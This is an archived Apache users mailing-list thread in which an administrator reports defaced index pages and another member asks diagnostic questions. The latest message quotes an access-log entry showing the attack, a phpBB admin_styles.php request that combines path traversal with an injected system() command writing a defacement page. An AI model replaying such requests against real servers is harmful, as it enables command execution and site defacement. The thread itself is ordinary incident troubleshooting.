Re: [users@httpd] Hacked the website replace the index.hm page

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Hi Tim,

The intruder replaced only two index.htm files. There is no evidence that the server has been hacked other than two index.htm file has been replaced.

The phpBB websete is owned by different user and group than the site which has been hacked. 

The following is from the access.log. ( The hacked replaced the index.htm with one line of text.

201.128.21.202 - - [08/May/2005:08:05:43 +1000] "GET /virtualforum//admin/admin_styles.php?mode=addnew&in
stall_to=../../../../../../../../../../../../../../../../../../../tmp&nigga=system(\"cd%20/web/departments/student;echo%20XTech%20Inc%20ownz%20-%20students%20-%20y0u%20suck%20>index.shtml\");&sid=655f5166e6110dc5959fe46a96192331 HTTP/1.1" 200 7976


Thanks
Mathew


>>> tim@xxxxxxxxx 9/05/05 9:24:23 >>>
Ok. What evidence do you have that it was a hack? (as opposed to, say, FTP
passwords getting out somehow).

And, by any chance, do the sites that were hacked share any passwords with
accounts on any of the phpBB installations? And, with what were the index
files replaced?

----- Original Message ----- 
From: "Mathew Thomas" <mathew.thomas@xxxxxxxxxxx>
To: <users@xxxxxxxxxxxxxxxx>
Sent: Sunday, May 08, 2005 7:15 PM
Subject: Re: [users@httpd] Hacked the website replace the index.hm page


Hi Tim,

Thanks for the reply. Yes, couple of virtual hosts are running phpPBB. The
website which have been hacked are not using PHP,mysql or ssl.

Thanks
Mathew


>>> tim@xxxxxxxxx 9/05/05 8:56:04 >>>
We'll probably need more details. You running phpBB anywhere?

----- Original Message ----- 
From: "Mathew Thomas" <mathew.thomas@xxxxxxxxxxx>
To: <users@xxxxxxxxxxxxxxxx>
Sent: Sunday, May 08, 2005 6:49 PM
Subject: [users@httpd] Hacked the website replace the index.hm page


Hi All,

We are running apache_1.3.32 with mod_ssl, mySQL and PHP. OS is Solaris 9.
Apache is running with

User httpd
Group http

Most of the Documentroot is owned by httpd.( There are several virtualhost
running on this server)

its-wu-web:departments#  ps -ef | grep http
   httpd 18168 24970  0 00:00:02 ?        0:04
/usr/local/apache/bin/httpd -DSSL
   httpd 16498 24970  0 08:39:24 ?        0:00
/usr/local/apache/bin/httpd -DSSL
   httpd 16492 24970  0 08:39:24 ?        0:00
/usr/local/apache/bin/httpd -DSSL
   httpd 15664 24970  0 08:28:56 ?        0:00
/usr/local/apache/bin/httpd -DSSL
   httpd 16488 24970  0 08:39:23 ?        0:00
/usr/local/apache/bin/httpd -DSSL
   httpd 18182 24970  0 00:00:07 ?        0:04
/usr/local/apache/bin/httpd -DSSL

Some how couple of the website was hacked and replaced the index.htm pages.
How can I prevent it happen again?

Thanks
Mathew




---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx 
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx 
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx 


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx 
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx 
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx 



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx 
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx 
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx 


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx 
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx 
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx 


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx



[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux